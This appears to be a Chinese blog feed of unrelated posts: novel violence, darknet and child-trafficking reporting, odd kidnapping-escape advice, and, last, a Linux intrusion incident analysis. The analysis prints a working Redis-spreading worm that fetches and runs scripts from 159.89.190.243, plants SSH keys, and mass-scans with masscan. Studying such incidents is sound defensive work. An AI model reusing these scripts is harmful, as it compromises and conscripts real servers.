小娇妻已不忍心再责备“赵子龙”了,也捧着他的脸,给了她一个笑容,“也挺好的,一起上路,不害怕。” “赵子龙”感觉到脑后一阵凌厉的风吹过,接着脖子一凉,腔子里的鲜血飞溅而出,染红了小娇妻的脸。 “好!”周围爆发出一阵喝彩,掌声雷动。 参将第一刀没有砍掉里长的脑袋,有点沮丧,这次调整了角度,刀身从“赵子龙”脖子上划过,脑袋却像还长在身体上,鲜血从脖子的裂缝中四面八方喷射,像一道喷泉,被传说了很久。 参将不舍得就这么杀了这位花容月貌的“白娘子”,虽然她已身怀六甲,但并不妨碍他发泄兽欲。可惜“白娘子”没给他这个机会,她抽出了一把防身的匕首,一刀刺进了自己的心窝。 参将很沮丧,一刀划开了她,从眉心自下,一直到两腿中间,劈开了一道二尺长的口子。 小夫妻俩如愿结伴而行了。 全镇和周边几个村子全被屠杀殆尽,男女老少,一个没留。男人直接杀,女人先奸后杀。 有点意外,这支队伍里居然真有一名绿营军就是苗集籍的,他虽然没有动手,但却眼睁睁地看着父老乡亲被战友们屠杀,他的父母兄弟也死于这场屠杀中,而他没有阻拦。 他为什么没阻拦呢?这个问题追了他半辈子,每次一冒出来,他就赶紧找别的事儿干,转移注意力,实在躲不掉了,只好面对,每次都能说服自己。 那些绿营军砍下了上千只手,连同之前砍掉的一起,奏报朝廷,说斩杀了上万叛军。满朝文武弹冠相庆,杏儿乐得花枝乱颤,参将被擢升为总兵。 不止是皇帝懵懂无知,整个大清就是个萌神,纯洁的像四岁的小姑娘,五岁就没这么好骗了。 在平定太平天国的战争中,湘军淮军风头出尽,而朝廷的正规军却被太平军追得满地跑,很没面子了。绿营军打仗不行,但是要脸有一套,想出了这么一招,杀老百姓,用老百姓冒充叛军,向朝廷邀功请赏。 这部书的很多情节都在历史上真实发生过,在各种稗官野史、笔记小说里都有记载,经作者加工串联而成。读者觉得荒诞的部分,可能都是真事儿。 吴晋一直待在妈妈的肚子里,等着横空出世,但妈妈一直不使劲儿,他只好自己从妈妈那娇嫩的肚皮里顶了出来。 吴晋来到人世间看到的第一个场景,就是琳琅满目的死人,人都是横着的,血流成河。吴晋以为走错了,跑到地狱里来了,想退也退不回去,正彷徨间,一个戴着翡翠珠帽、二尺来长的小男孩竖着跑了过来,诧异地望着这个从死尸的肚皮里钻出来的小动物。 “爹,娘,这有个小孩儿,活的。”小男孩回头喊道。 小男孩喊来了一对二十来岁的青年夫妇,一家三口小心翼翼地剪断了吴晋的脐带,彻底切断了他要回头的路。 吴晋忽然就不哭了,瞪着眼睛观察着这一家三口,笑了。 一家三口为这件事争论了十几年,吴豫坚持认为吴晋确实笑了,但父母一直觉得吴豫是看错了,小孩子不可能一出生就会笑。 吴晋遗传了“赵子龙”和“白娘子”的优良基因,五官晶莹剔透,象雕刻出来的,神似吴台玉佩上那个正在拜观音的童子,浑身上下带着一股仙气儿。尤其是两只清澈通透的小眼睛,看一眼就仿佛被过滤了一遍。 一家三口对这个捡来的小童子爱不释手。是少爷吴豫第一个把吴晋从娘肚子里扒出来的,他执意认为吴晋是他的孩子,应该管他叫爸爸。经过协商,吴豫妥协了,勉强当了个哥哥,因为他只比吴晋大五岁。 从此吴晋成了吴家二少爷。 吴家没想到的是,他们捡了个天才。 吴家也和吴晋的父母一样,逃难到了苗集,只是他们运气比较好,在绿营军离开后才来的。吴豫降生在豫中一带,所以叫吴豫。吴家是在晋地捡到了吴晋,他就叫了吴晋。 吴豫的父亲叫吴台,出身徽商世家,长得白白胖胖,像一尊弥勒,永远笑呵呵,不管遇到什么难事,只要见到他那张嘴角上挑、眼睛眯缝的笑容,烦恼马上去了一半。吴台喜欢给人讲笑话,给别人带来快乐,是他最快乐的事。 吴台的妻子出身书香门第,温婉贤淑,心软,喜欢救济穷人。 太平军覆灭了,天下终于太平了,吴家迁回了徽州。商人吴台继承祖业,再创辉煌,短短数年,重新积累了万贯家资,在多地设立了分号。 大少爷吴豫不爱读书,喜欢舞枪弄棒,练了一身武艺,从小立志要精忠报国。吴晋正好相反,不但酷爱读书,而且有过目不忘之能。一篇文章,十岁的吴豫一天都背不下来,五岁的吴晋过目成诵。 吴晋十岁替吴豫考中了秀才,十三岁替吴豫考中了举人。 吴晋为什么要替吴豫考呢? 因为吴晋知道了自己的身世。 吴家在苗集不但救了吴晋,还救了一个十八九岁的小伙子,名叫苗全。苗全被绿营军捅了两刀,砍掉了一只手,但没死,被吴家救了。因为苗全会打算盘,吴家就把他留在身边算账。 吴晋的父母被苗集百姓扭送到参将面前的时候,苗全也跟着去了,目睹了那场惨案的全过程。吴晋八岁那年,苗全喝了点酒,心怀愧疚地对他讲述了那件悲惨的往事。 八岁的吴晋沉默了一个下午,回到家,恭恭敬敬地给吴台夫妇磕了三个响头,辞去了二少爷的身份。 吴家对他恩重如山,他要报恩,一辈子做吴家的奴仆。 吴夫人抱着吴晋哭了一晚上,从来笑呵呵的吴台收起了笑容,和吴豫一起把苗全骂得狗血淋头。然而吴晋心意已决,把自己放在了和苗全一样的位置,要一生服务于吴家。任凭吴豫骂他读书读坏了脑子,但改变不了他的心意。 有一点没变,吴晋仍旧管吴台叫爹,管吴夫人叫娘,管吴豫叫大哥。 从少爷自动降格为家奴,这不是什么人都能做到的,何况还是个八岁的孩子。吴台原以为,吴晋将来一定能成长为一个谨守仁义礼智信的谦谦君子。但吴晋十二岁那年,展露了另外一项天赋,令吴台十分担心,这货将来必定是个混世魔王。 ...

    2020-04-26 507
  • 5岁取悦男性,14岁参加成人派对,暗网的恋童产业有多可怕?

    我们常常会产生一种错觉,仿佛自己能够看到的网络世界就是全部。 可事实上,像这些能够通过常规网络检索就获取到的内容,不过只是冰山的一角,在未知的海面之下,还有需要通过特殊操作或者个别软件辅助才能够浏览的 暗网。 其大小或许是普通网络的400到550倍,而大部分内容却极其黑暗、变态,令人看一眼就脊背发凉甚至开始怀疑人生。 客观来讲,暗网里并不全是非法行为,也有很多正常操作,一些人会在里面的社交媒体上进行互动,也有书迷、影迷俱乐部,以及唱歌比赛等等。 因为暗网独特的匿名性,用户们的隐私能够得到保护,这点曾被不少人称赞。但凡事都有两面性,因为不容易追查到本人, 这里于是滋生了很多犯罪行为,也让很多人得以肆无忌惮地释放内心的黑暗面。 其中,相对而言不太严重的违法行为有:贩卖假护照、假的大学学历以及假的奢侈品等。 再严重一点就是毒品贩卖,暗网上的价格一般会低于市面上的“常规”价格,此外,还会销售一些致命的化学物质以及军火武器等。 然而比起这些非法买卖,暗网上还有更多会让人产生生理不适,甚至挑战人承受底线的内容。 比如,动物虐待,还有一个网站专门用来PO死去的婴儿,他(她)们被打扮得好好的,仿佛还活着,而大部分用户都是无法接受自己孩子已经死去的妈妈们。 但这仍不是最不可思议的,在暗网上还有令人深恶痛绝的人口贩卖和杀手雇佣业务,以及一些确实存在但内容真实性尚未被官方证实的论坛,比如,一些人会在里面讨论如何食人以及被食,甚至安排线下聚会互相食用对方身体,还有的网站会绑架无家可归的人去进行残酷的人体实验,而更让人无法接受的还有直播杀人和折磨人,这类网站要先支付一定数额的比特币才能进入。 但在所有的网站中,有一类最“受欢迎”,其网站数量未必有以上提到的那些内容多,但流量却最大,那就是 儿童性侵。 根据朴次茅斯大学的Gareth Owen博士几年前的研究表明, 暗网上甚至超过80%的流量都来自这些儿童性虐待网站。 半个多月前,VICE News发布了一个视频,里面记录的就是美国警方联合菲律宾当地的反人口贩卖组织,透过暗网抓捕两个皮条客的真实过程。 其中一个罪犯是菲律宾的一位妇女,她主营线上的儿童性爱直播,常在暗网上散布包括自己女儿在内的女童们表演的性暗示动作以招揽生意。 (图源:YouTube) 警方假扮成恋童癖前去询问性爱视频的购买,在问到女孩们都会做什么时,卖家的描述非常下流不堪, 7名女孩,最小的才5岁,最大的也不过13,但她们却已经学会如何玩弄一些技巧去取悦成年男人,她们的房间内到处都是性玩具。 在美国,每一天都有成千上万的人去购买这些儿童的线上直播。每进账一笔,都意味着又一名无辜的少女被强奸。 而这类交易除了线上,还分线下,视频中警方的另一个抓捕对象负责的就是这种业务。他会带着小女孩让客户当面验货,一边下流地抚摸女孩的皮肤,一边推销说:“她的皮肤非常滑”。 更可怕的是,他手里有100多个这样的女孩可以卖,而且年龄都在15岁以下。 谈好后,对方带着一小帮女孩去警方事先埋伏好的房里开性爱派对。很难想象,这些小女孩们进门后没有丝毫恐惧,就在一旁打打闹闹,听着皮条客和陌生男人谈论自己活好而且什么都能做,却没有任何反应,仿佛早就习以为常。 在警方解救她们时,女孩们最先想到的不是“我获救了”,而是哀求警方不要抓自己,在她们尚未成熟的思想里,究竟是怎样看待自己的?皮条客们平时都给她们灌输了怎样的观念? 在最应该被爱护的年纪,在同龄人都在上学、过着无忧无虑的生活时,这些女孩却在面对着这个世界上最肮脏的交易,和来自成年人最大的恶意。 获救后女孩们接受了心理治疗,看到这些孩子们一边痛哭一边愤怒地捶打地面发泄情绪,实在太让人难受。 目睹了她们的经历,相信没有人会不感到愤怒,我们都希望能尽快将这些皮条客和恋童癖一网打尽, 然而,现实却令人绝望,这类网站屡禁不止,而且随着网络的发展越发严重,想要彻底禁止儿童性侵这一利益庞大的产业,谈何容易。 15年,这些美国专家们分析过的儿童性暴力视频的总时长是:100年,听着都让人绝望。但这仍然不是全部。 当地政府部门甚至研究表明,有一半的人都承认看过儿童色情片,其中更是有人真的玷污过女童, 恋童癖远非我们想象中的一小部分群体。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-26 778
  • 世界悬案:蓝可儿死亡真相被揭开,凶手就在她旁边

    2013年2月19日加拿大籍华人蓝可儿的尸体在美国洛杉矶塞西尔酒店楼顶的水塔内被发现,然而此案至今都存在疑点。蓝可儿死亡地点的奇怪和她失踪前在电梯里的奇怪举动,让很多人觉得此案可能是灵异事件。 蓝可儿的尸体被发现的时候,全身赤裸以头朝下脚朝上的姿势沉在酒店的水箱底部。警方为了捞出尸体,也费了很大的功夫,派出了20多位消防员,用了一个多小时才将蓝可儿的尸体捞出来。然而此案最让人疑惑的就是她在电梯中的举动,从监控视频中可以看到她按了电梯的每个楼层,而且电梯的门也一直没有关闭,蓝可儿一会儿走出去一会儿走进来,甚至还躲在了电梯旁边。后来这一案件引起了全世界的关注,也有人注意到了一些线索,并作出了解释。 蓝可儿进电梯之前应该是在和别人交流,然后有人帮她那了电梯,对方显然很熟悉酒店的构造,也知道电梯里有摄像头,所以从未露面也就没有被摄像头拍到,这也意味着当时此人已经对蓝可儿有了杀意。而且当时酒店里的一个房客表示住在那家酒店的大部分是长期住户,还有一部分是游客。有人表示当天晚上曾听到楼道里有吵闹声,而且当天酒店有些房间的地板还被水淹了。 当时酒店的住户最无法接受的是,蓝可儿尸体的发现意味着他们过去几天引用的水竟然是“尸水”。有住户表示她们确实觉得水的味道怪怪的,但并没有多想。而警方后来也提取了这些水去检测,酒店也即使更换了用水。但最让人好奇的是蓝可儿在电梯中的举动,看上出是灵异事件,但也有人给出了合理的解释。 蓝可儿之所以进电梯随意按了些楼层,是因为她在等男朋友来找她,所以她才会有走进来又走出去这样的举动。而她躲在角落里是因为听到外边有声音所以才躲起来。电梯门一直没关可能是男朋友在外边按着开关,后来她还是决定跟男朋友走了,所以电梯恢复了正常。而这些行为很有可能是两人吵架了在闹别扭,后来男友可能出于别的心理真的对她痛下杀手。而警方给最后给出的结论是蓝可儿是意外溺死,她生前患有躁郁症。希望有一天一切能水落石出,让死者安息。 ...

    2020-04-26 1034
  • 暗网简史,朋克主义的地下世界

    我们一般人浏览的互联网,可以追踪到地理位置以及通信人身份,统称为明网。 与此相对,暗网是个地下世界,服务器地址和传输数据都匿名匿踪,只能通过特殊软件授权,对电脑设置以后才能连接到的网络。 近日5.38亿条微博数据在暗网销售,1.72亿条有账号基本信息,比如手机号,其中不乏明星大V,这些数据的暗网售价0.177比特币,折合人民币不到7500元,之后微博回应,手机号是去年被人利用通讯录接口批量导入,暴力匹配出来几百万个账号和昵称,并没涉及身份证、密码等敏感信息。 非法数据、假钞、毒品、武器......各种黑色交易应有尽有,相比较明网,暗网的神秘,透漏着贪婪、放纵和令人恐惧的气息,我们大多数人对此所知甚少,只知道还有个不能被搜索引擎收录追踪的网络世界。 比特币为首的加密货币,和暗网一样不受市场监管,在地下网络中,加密货币是通用交易模式,也是ICO最大的应用市场。换句话说,正是因为2009年比特币的出现,才催熟了暗网在世界上的流行。 但真正的暗网历史,几乎和互联网一样悠久。 02 新型技术早期,赞助者大多是美国军方。 阿帕网(ARPAnet)是全球互联网鼻祖,ARPA是美国国防部旗下高级研究计划局(Advanced Research Project Agency)首字母简称,ARPA旗下核心机构之一是信息管理处(IPTO),主要负责研究电脑图形、网络通讯、超级计算机等课题,也是这个IPTO研发出了阿帕网。 信息管理处最早的负责人名叫利克莱德(J. C. R. Licklider),1962年加入IPTO,在任期间赞助了当时美国70%左右的计算机科学研究,在他1963年发给同事的备忘录内容中,成功预见了阿帕网和图形界面的诞生。 IPTO的第三任继任者名叫泰勒(Bob Taylor),这个人对互联网的意义重大。1965年加入IPTO,泰勒希望建设一个计算机网络,能把ARPA资助的大学和企业实验室的项目小组连接起来,就是阿帕网的最早雏形。 为了能把各项目组的局域网连接在一起,泰勒1967年邀请日后成为“阿帕网之父”的拉里罗伯茨(Larry Roberts)加入IPTO,1969年底,阿帕网成功投入运行。发展到1975年,阿帕网终于把大部分美国大学和研究实验室的局域网连接在了一起。 这期间,发生了世界上第一笔网络交易,一个斯坦福大学的学生,通过阿帕网账户和一个麻省理工学院的学生达成交易,略有讽刺意味的是,有史以来首次电商交易的货物是毒品。 泰勒后来进入施乐实验室(帕罗阿图研究中心),1973年成功研发出来Alto(世界上首台个人电脑),包含图形界面、以太网、显示器和一种三键鼠标,这件事最终成就了乔布斯。 乔布斯1979年参观施乐实验室,看见Alto以后兴奋不已,乔布斯回忆时说道,“我当时看到了计算机产业的未来。”此后故事我们耳熟能详,苹果陆续推出Apple Lisa和Macintosh,为iMac奠定了基础。 早期的阿帕网,实际上就是把局域网按照固定协议连接在一起,当时还出现了很多并行的同类网络,那些不愿意或者没来得及接入阿帕网主干的网络节点,因为找不到也无法连接,这些就被人叫作Darknet,也就是暗网,早期暗网和黑市并没联系。 03 80年代,数据避风港横空崛起。 类似今天国内很多博彩类黑灰产业,运营者选择把服务器放在国外,利用其他国家开放的法规政策,然后偷梁换柱,把黑灰产业通过互联网引渡给国内用户,套取利益同时还逃脱了国内法律制裁,类似的公开报道已经屡见不鲜。 美国80年代末期的情况类似,那时Internet还不通用,苹果、IBM、康懋达(Commodore)等个人电脑品牌问世不久,全球各种网络雨后春笋一样冒出来,人们通过电子邮件、BBS和USEnet等应用沟通,互联用户大多是一些精英人群。 很多网站运营者担心数据存储的安全性,同时也为了避税、灰色经营等不同目的,大量企业把服务器选择安置在一些法律宽松的国家,以免被政府控制,这些数据避风港的网站算得上是第二批暗网。 值得一提的是,最知名的数据避风港企业诞生于2000年,在私人国家西兰公国领土经营,西兰公国原本是英国二战期间建于公海上的一座防控堡垒,二战结束后废弃,一名前英国退役军官罗伊(Roy Bates)1967年占领,然后歪解国际法宣布独立为国家。2000年8月份,“西兰王子”迈克尔(Michael Bates)收购一家英国公司,改名为HavenCo。 HavenCo创始人兼CEO是“密码朋克”小组成员肖恩(Sean Hastings),一个典型的无政府主义者,HavenCo成立之初获得大量知名媒体报道,之后2008年11月,没有任何公告便停止运营了。肖恩现在也致力于在公海建立永久住所,意在复制西兰公国模式。 04 摇滚、嬉皮士、乌托邦、赛博朋克,在美国的60-80年代接踵而至,滋养出90年代“密码朋克”这么个精英群体,为暗网和区块链留下浓墨重彩的一笔。 “赛博朋克”创造了各种科幻小说,知名的有《黑客帝国》、《阿丽塔》、《银翼杀手》等,科幻届时在美国形成一股社会风潮,其核心主张影响至今,主要是嘲讽和警示科技文明与现实宇宙越来越模糊的界限。 “赛博朋克”的影响下,密码学开始迅速发展。 英国政府通讯部(GCHQ)的两名密码学家,詹姆斯(James Henry Ellis)和克里福德(Clifford Christopher Cocks)早在70年代早期就提出了公钥加密的概念,不过那时由政府主导,这个技术不仅未被采用,还遭到了雪藏。 1976年,密码学家惠特菲尔德(Whitfield Diffie )和马丁(Martin Hellman)提出了非对称加密技术,并出版了《新密码技术指南》这本书籍,成为日后互联网加密技术的基石。 90年代,互联网受到广泛应用,3个密码学家蒂姆.梅(Tim May)、埃里克(Eric Hughes)、约翰(John Gilmore)成立了一个小组,他们每月会在约翰创立的公司讨论密码学、政治、哲学、计算机技术等各种先锋话题。 这个讨论小组的人数越来越多,之后他们编码了一套加密邮件系统,可以让更多技术极客匿名交流,这个邮件列表,被一位名叫裘德(Jude Milhon)的女成员命名为“密码朋克”。他们之中很多人,在互联网发展历史中都有举足轻重的地位。 创始人蒂姆.梅是英特尔科学家,约翰是太阳公司第5号元老,其他的重量级成员更多,维基解密创始人阿桑奇(Julian Assange)、万维网发明者蒂姆(Tim-Berners Lee)、比特币创始人中本聪、BT下载创造者布拉姆(Bram Cohen)、PCG 1.0和2.0的两个作者...... 创始人之一埃里克早期发布的《密码朋克宣言》中写到:“我们希望拥有隐私,创建允许匿名交易的网络,我们致力于构建匿名系统,通过数字签名和加密货币来捍卫隐私”。 “密码朋克”的匿名邮件系统,是一种新的暗网。 “密码朋克”1997年达到顶峰,平均每天约有30封邮件,大约2000个用户,基本都来自最知名大学/企业/实验室的教授大神们,2001年9/11以后,人们的讨论积极性开始衰减,话题逐渐变得无趣,不久后宣告解散。 “密码朋克”同时期,MP3技术开始变革音乐产业,CD歌曲可以压缩为MP3格式,然后上传在网上下载,这一技术大大冲击了CD音乐的版权市场,可能也是互联网最早的“共享”模式。 一个名叫Napster的MP3音乐共享网站,2000年前后遭到美国重金属乐队Metallica创始人拉斯(Lars Ulrich)的起诉,Napster网站很快倒闭了,但这种模式开始爆发。 人们通过邮件或者其他隐藏方式共享MP3音乐,也属于暗网。明星们纷纷抵制,但用户已经习惯了免费歌曲,直到演化成当下的流媒体形式。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-26 1391
  • 抖音视频无水印在线解析

    一键去除,快捷方便,永久免费。 地址:http://tv.dufengvip.cn/dy.html...

    2020-04-26 530
  • 被抓到暗网如何逃生?

    这个得全方位分析 我就设一种最常见的情景 对方是一个组织,目的宰了你 你的身体素质一般 心理素质一般 所有电子设备被没收 方便更是荒山野岭或者是他们基地的老窝 如果你们语言相通 如果他是为了直播,时间还没开始 你可以尝试着通过巧妙利用语言学查询现在所处位置的大致情况 如果你被捆绑 对方是一个不愿多言的粗汉 你可先表达出对世界无感,死就死了的态度 (如果对方目的是为了获得虐待的快感,他们会激动起来的,假设情绪变差不大) 然后无意间就说“我想看看这个世界最后的运转情况,把绳子解一下,ok?(语气要平淡且漠不关己)”成功解开,之后,不要激动(因为前提有你是一个心理素质一般的) 前观察地形,以及一切可利用的工具 然后你可以接近那个粗汉 现扯一些有的没的,获取“不必要的”信息(例如,对方的兴趣,或者抓的人的年龄段) 问他“像我这样的小白鼠,一个你们大概能盈利多少钱” 他们会回答的,相信我 然后,你就说“虽然我有在隐瞒,但我想你应该也能猜出来一些,我已经对死亡无欲无求了,既然这样,你们想不想有更稳定的小白鼠来源呢” 这里语气要玩味,然后不等他开口就自言自语似的“真想让他们也死呢” 注意,语气要玩味,如果表情能够在戏谑一点更好 注意,分析地形要用余光分析,不可来回走动(他们不是傻子) 如果压根解了绳子就不理你呢? (如果不理你,跳过上这一步) 来回走动,但不要表现的有走到意思(前前后后都要变现的无欲无求,置之生死) 表现的不要有“我是一个即将被你们杀死的人,我要躲着你们” 而是主动接近 甚至表现出自己可以被利用! 如果他们选择利用你 那么你获生的希望将无穷大(不要到当地警察局报案) 如果他们不理你 横竖都是死 语气表现的很狼狈,在摄像机下被玩弄 不如,不如,停止这个假设! (像逃生简单么?不简单。这个的前提是,他们的组织规模并不算大,且他们需要钱或者物的来源。而且,你还得能临危不乱) 被抓,也是没有一个特定的标志的 尽量不要吃陌生人的东西 不要独自走在人少或者不熟悉的地方 不要在当地政府报案 报案前先做好证据备份,以及发送到互联网之中(例如国内外知名网站) 最后,向天祈愿 暗网本身无罪 是有罪的人将他视为一个工具 因为这个问题,在刚开始,我想到的是批斗 太多人迷失在了充满谎言的网络世界里 QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-24 624
  • Tor项目裁掉了三分之一的员工

    Tor项目以及Tor隐私浏览器背后的组织,在周五宣布,由于冠状病毒大流行造成的经济负担,将解雇三分之一的员工。   Tor项目的执行主任Isabela Bagueros周五在其网站上发表声明说:“Tor和世界上很多地方一样,已经陷入了COVID-19危机。” 他说:“和许多其他非营利组织和小企业一样,金融危机给我们带来了沉重打击,我们不得不做出一些艰难的决定。我们不得不放弃13位伟大的人物,正是他们让全世界数以百万计的人能够接触到Tor。” “我们的核心团队将由22人组成。” Bagueros表示,尽管裁员,目前的团队将能够继续运行其服务器和软件。这包括Tor anonimity网络和Tor浏览器包。 Tor项目的决定是任何人都能预料到的。这家总部位于美国的非营利组织完全依靠捐款生存。 每年,该项目都会在年底举办一场捐赠活动,以支持下一年的财务状况。 由于大多数捐助者(用户、美国政府和私营部门)都把重点放在如何度过COVID-19的经济危机上,Tor团队似乎在筹集资金以支持自己渡过大流行方面遇到了问题。 Tor项目并不是唯一经历困难时期的组织。其他公司也被迫解雇员工。该榜单包括特斯拉、百思买、GAP、梅西百货、Yelp、迪士尼、Vox Media等大品 ...

    2020-04-20 522
  • 记一次linux(被)入侵

    0x00 背景 周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了一下,被拒绝了,问了下默认的22端口被封了。让运维的同事把端口改了一下,立马连上去,顺便看了一下登录名:root,还有不足8位的小白密码,心里一凉:被黑了! 0x01 查找线索 服务器系统CentOS 6.X,部署了nginx,tomcat,redis等应用,上来先把数据库全备份到本地,然后top命令看了一下,有2个99%的同名进程还在运行,叫gpg-agentd。 google了一下gpg,结果是: GPG提供的gpg-agent提供了对SSH协议的支持,这个功能可以大大简化密钥的管理工作。   看起来像是一个很正经的程序嘛,但仔细再看看服务器上的进程后面还跟着一个字母d,伪装的很好,让人想起来windows上各种看起来像svchost.exe的病毒。继续 ps eho command -p 23374 netstat -pan | grep 23374 查看pid:23374进程启动路径和网络状况,也就是来到了图1的目录,到此已经找到了黑客留下的二进制可执行文件。接下来还有2个问题在等着我: 1,文件是怎么上传的? 2,这个文件的目的是什么,或是黑客想干嘛?   history看一下,记录果然都被清掉了,没留下任何痕迹。继续命令more messages, 看到了在半夜12点左右,在服务器上装了很多软件,其中有几个软件引起了我的注意,下面详细讲。边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?对,计划任务。 crontab -e 果然,线索找到了。 0x02 作案动机 上面的计划任务的意思就是每15分钟去服务器上下载一个脚本,并且执行这个脚本。我们把脚本下载下来看一下。 curl -fsSL 159.89.190.243/ash.php > ash.sh 脚本内容如下: uname -a id hostname setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 crontab -r 2>/dev/null rm -rf /var/spool/cron/* 2>/dev/null mkdir -p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/root echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/root   yum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null   bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null 大致分析一下该脚本的主要用途: 首先是关闭SELinux,解除shell资源访问限制,然后在/root/.ssh/authorized_keys文件中生成ssh公钥,这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多,关于ssh keys的文章可以参考这一篇文章SSH原理与运用。接下来安装bash,最后是继续下载第二个脚本bsh.php,并且执行。   继续下载并分析bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/... sleep 1 if [ -f .watch ]; then rm -rf .watch exit 0 fi sleep 1 echo 1 > .watch sleep 1 ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null ps x | awk '!/awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null sleep 1 if ! [ -x /usr/bin/gpg-agentd ]; then curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db echo '/usr/bin/gpg-agentd' > /etc/rc.local echo 'curl -fsSL 159.89.190.243/ash.php|sh' >> /etc/rc.local echo 'exit 0' >> /etc/rc.local fi sleep 1 chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd sleep 1 if ! [ -x "$(command -v masscan)" ]; then rm -rf /var/lib/apt/lists/* rm -rf x1.tar.gz if [ -x "$(command -v apt-get)" ]; then export DEBIAN_FRONTEND=noninteractive apt-get update -y apt-get install -y debconf-doc apt-get install -y build-essential apt-get install -y libpcap0.8-dev libpcap0.8 apt-get install -y libpcap* apt-get install -y make gcc git apt-get install -y redis-server apt-get install -y redis-tools apt-get install -y redis apt-get install -y iptables apt-get install -y wget curl fi if [ -x "$(command -v yum)" ]; then yum update -y yum install -y epel-release yum update -y yum install -y git iptables make gcc redis libpcap libpcap-devel yum install -y wget curl fi sleep 1 curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz sleep 1 [ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4 fi sleep 3 && rm -rf .watch bash -c 'curl -fsSL 159.89.190.243/rsh.php|bash' 2>/dev/null 这段脚本的代码比较长,但主要的功能有4个: 1,下载远程代码到本地,添加执行权限,chmod u+x。 2,修改rc.local,让本地代码开机自动执行。 3,下载github上的开源扫描器代码,并安装相关的依赖软件,也就是我上面的messages里看到的记录。 4,下载第三个脚本,并且执行。   我去github上看了下这个开源代码,简直吊炸天。 MASSCAN: Mass IP port scanner This is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, > transmitting 10 million packets per second. It produces results similar to nmap, the most famous port scanner. Internally, it operates more > like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is > that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary > address ranges and port ranges. NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause  conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.   transmitting 10 million packets per second(每秒发送1000万个数据包),比nmap速度还要快,这就不难理解为什么阿里云把服务器冻结了,大概看了下readme之后,我也没有细究,继续下载第三个脚本。 setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 sleep 1 iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null sleep 1 rm -rf .dat .shard .ranges .lan 2>/dev/null sleep 1 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> .dat echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'config set dir "/var/spool/cron/"' >> .dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "/var/spool/cron/crontabs"' >> .dat echo 'save' >> .dat sleep 1 masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .shard sleep 1 masscan --max-rate 10000 -p6379,6380 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .ranges sleep 1 ip a | grep -oE 